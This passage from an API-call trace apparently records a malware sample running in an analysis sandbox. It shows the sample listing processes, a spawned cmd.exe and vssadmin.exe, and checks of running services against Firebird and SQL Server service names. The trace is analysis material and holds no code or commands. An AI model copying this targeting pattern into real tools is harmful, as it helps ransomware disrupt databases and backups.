dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.213] lstrlenW (lpString="svchost.exe") returned 11 [0222.213] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.213] lstrlenW (lpString="dwm.exe") returned 7 [0222.213] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x59, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.214] lstrlenW (lpString="svchost.exe") returned 11 [0222.214] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.215] lstrlenW (lpString="svchost.exe") returned 11 [0222.215] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.216] lstrlenW (lpString="svchost.exe") returned 11 [0222.216] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.216] lstrlenW (lpString="svchost.exe") returned 11 [0222.216] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.217] lstrlenW (lpString="svchost.exe") returned 11 [0222.217] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.218] lstrlenW (lpString="svchost.exe") returned 11 [0222.218] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.219] lstrlenW (lpString="svchost.exe") returned 11 [0222.219] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.219] lstrlenW (lpString="svchost.exe") returned 11 [0222.219] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.220] lstrlenW (lpString="svchost.exe") returned 11 [0222.220] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.221] lstrlenW (lpString="spoolsv.exe") returned 11 [0222.221] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.222] lstrlenW (lpString="svchost.exe") returned 11 [0222.222] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.222] lstrlenW (lpString="svchost.exe") returned 11 [0222.223] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.223] lstrlenW (lpString="audiodg.exe") returned 11 [0222.223] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0222.224] lstrlenW (lpString="sihost.exe") returned 10 [0222.224] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.225] lstrlenW (lpString="svchost.exe") returned 11 [0222.225] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0222.226] lstrlenW (lpString="taskhostw.exe") returned 13 [0222.226] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.226] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0222.226] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0222.227] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0222.227] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.228] lstrlenW (lpString="explorer.exe") returned 12 [0222.228] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0222.229] lstrlenW (lpString="Memory Compression") returned 18 [0222.229] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0222.229] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0222.230] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0222.230] lstrlenW (lpString="SearchUI.exe") returned 12 [0222.230] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0222.231] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0222.231] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.232] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0222.232] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0222.232] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0222.233] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0222.233] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0222.233] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.234] lstrlenW (lpString="conhost.exe") returned 11 [0222.234] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0222.235] lstrlenW (lpString="roof competitive.exe") returned 20 [0222.235] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0222.235] lstrlenW (lpString="trustees.exe") returned 12 [0222.235] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0222.237] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0222.237] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0222.237] lstrlenW (lpString="isbn.exe") returned 8 [0222.237] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0222.238] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0222.238] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0222.239] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0222.239] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0222.240] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0222.240] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0222.240] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0222.240] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0222.241] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0222.241] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0222.242] lstrlenW (lpString="playstation iraq.exe") returned 20 [0222.242] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0222.243] lstrlenW (lpString="harbor.exe") returned 10 [0222.243] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0222.243] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0222.243] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0222.244] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0222.244] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0222.245] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0222.245] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0222.245] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0222.246] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0222.246] lstrlenW (lpString="larent.exe") returned 10 [0222.246] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0222.247] lstrlenW (lpString="stereo.exe") returned 10 [0222.247] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0222.248] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0222.248] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0222.249] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0222.249] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0222.249] lstrlenW (lpString="state.exe") returned 9 [0222.249] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0222.250] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0222.250] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.251] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0222.251] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0222.252] lstrlenW (lpString="taskhostw.exe") returned 13 [0222.252] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0222.253] lstrlenW (lpString="sppsvc.exe") returned 10 [0222.253] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.254] lstrlenW (lpString="svchost.exe") returned 11 [0222.254] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0222.255] lstrlenW (lpString="Pg.exe") returned 6 [0222.255] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0222.255] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0222.255] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.256] lstrlenW (lpString="conhost.exe") returned 11 [0222.256] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0222.257] lstrlenW (lpString="cmd.exe") returned 7 [0222.257] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.258] lstrlenW (lpString="conhost.exe") returned 11 [0222.258] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0222.259] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0222.259] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.259] lstrlenW (lpString="conhost.exe") returned 11 [0222.259] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0222.260] lstrlenW (lpString="vssadmin.exe") returned 12 [0222.260] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0222.261] CloseHandle (hObject=0x430) returned 1 [0222.261] Sleep (dwMilliseconds=0x1f4) [0222.767] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236baa8 [0222.768] EnumServicesStatusExW (in: hSCManager=0x236baa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0222.768] GetLastError () returned 0xea [0222.768] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x201e) returned 0x2372d70 [0222.768] EnumServicesStatusExW (in: hSCManager=0x236baa8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x201e, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0222.769] CloseServiceHandle (hSCObject=0x236baa8) returned 1 [0222.769] lstrlenW (lpString="Appinfo") returned 7 [0222.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0222.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0222.769] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0222.769] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0222.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0222.769] lstrlenW (lpString="AppXSvc") returned 7 [0222.769] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0222.769] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0222.769] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0222.769] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0222.769] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0222.769] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0222.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0222.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0222.770] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0222.770] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0222.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0222.770] lstrlenW (lpString="Audiosrv") returned 8 [0222.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0222.770] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0222.770] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0222.770] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0222.770] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0222.770] lstrlenW (lpString="BFE") returned 3 [0222.770] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0222.770] lstrcmpiW 